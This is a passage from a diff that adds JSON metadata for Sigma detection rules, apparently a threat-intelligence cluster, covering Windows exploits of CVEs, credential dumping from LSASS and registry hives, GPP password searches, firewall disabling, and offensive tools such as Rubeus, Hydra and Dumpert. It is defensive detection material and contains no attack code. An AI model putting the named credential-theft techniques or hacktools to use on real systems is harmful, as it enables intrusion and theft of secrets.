+ ], + "creation_date": "2018/02/22", + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2017/11/23", + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", + "value": "Exploit for CVE-2017-8759", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2017/09/15", + "filename": "proc_creation_win_exploit_cve_2017_8759.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378", + "meta": { + "refs": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" + ], + "creation_date": "2019/11/15", + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388", + "meta": { + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + 
"https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2019/11/20", + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", + "value": "Exploited CVE-2020-10189 Zoho ManageEngine", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" + ], + "creation_date": "2020/03/25", + "filename": "proc_creation_win_exploit_cve_2020_10189.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects new commands that add new printer port which point to suspicious file", + "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "meta": { + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/05/13", + "filename": "proc_creation_win_exploit_cve_2020_1048.yml", + "author": "EagleEye Team, Florian Roth", + "level": "high", + "falsepositive": [ + "New printer port install on host" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350", + "meta": { + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/07/15", + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/11/22", + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution", + "meta": { + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/08/11", + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "False Sysinternals Suite Tools", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2019/10/23", + "filename": "proc_creation_win_file_permission_modifications.yml", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "value": "Findstr GPP Passwords", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2021/12/27", + "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS", + "meta": { + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_findstr_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. 
This is often used in combination with icacls to look for misconfigured files or folders permissions", + "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "creation_date": "2022/08/12", + "filename": "proc_creation_win_findstr_recon_everyone.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/09/14", + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "author": "Tim Rauch", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)", + "meta": { + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/09/02", + "filename": "proc_creation_win_frp.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration", + "meta": { + "refs": [ + "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ], + "creation_date": "2022/03/29", + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "low", + "falsepositive": [ + "Certain software or administrative tasks may trigger false positives." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation", + "meta": { + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/03/02", + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "meta": { + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2022/10/10", + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects the execution GMER tool based on image and hash fields.", + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution", + "meta": { + "refs": [ + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/10/05", + "filename": "proc_creation_win_gmer_execution.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "value": "Use of GoToAssist Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/13", + "filename": "proc_creation_win_gotoopener.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations", + "meta": { + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/30", + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "author": "Nasreddine Bencherchali, X__Junior", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + 
"https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/04", + "filename": "proc_creation_win_hacktool_imphashes.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool", + 
"meta": { + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ], + "creation_date": "2021/07/31", + "filename": "proc_creation_win_hack_adcspwn.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool", + "meta": { + "refs": [ + "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/12/20", + "filename": "proc_creation_win_hack_bloodhound.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "value": "Hacktool by Cube0x0", + "meta": { + "refs": [ + "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/27", + "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper", + "meta": { + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/02/04", + "filename": "proc_creation_win_hack_dumpert.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra Password Guessing Hack Tool", + "meta": { + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_hack_hydra.yml", + "author": "Vasiliy Burov", + "level": "high", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + 
"logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "value": "Inveigh Hack Tool", + "meta": { + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/10/24", + "filename": "proc_creation_win_hack_inveigh.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command line parameters used by Koadic hack tool", + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" + ], + "creation_date": "2020/01/12", + "filename": "proc_creation_win_hack_koadic.yml", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack 
Tool", + "meta": { + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2022/04/27", + "filename": "proc_creation_win_hack_krbrelay.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool", + "meta": { + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], + "creation_date": "2022/04/26", + "filename": "proc_creation_win_hack_krbrelayup.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool", + "meta": { + "refs": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], 
+ "creation_date": "2018/12/19", + "filename": "proc_creation_win_hack_rubeus.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool", + "meta": { + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2022/10/20", + "filename": "proc_creation_win_hack_safetykatz.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of SecurityXploded Tools", + "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "value": "SecurityXploded Tool", + "meta": { + "refs": [ + "https://securityxploded.com/", + "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2018/12/19", + "filename": "proc_creation_win_hack_secutyxploded.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "uuid": 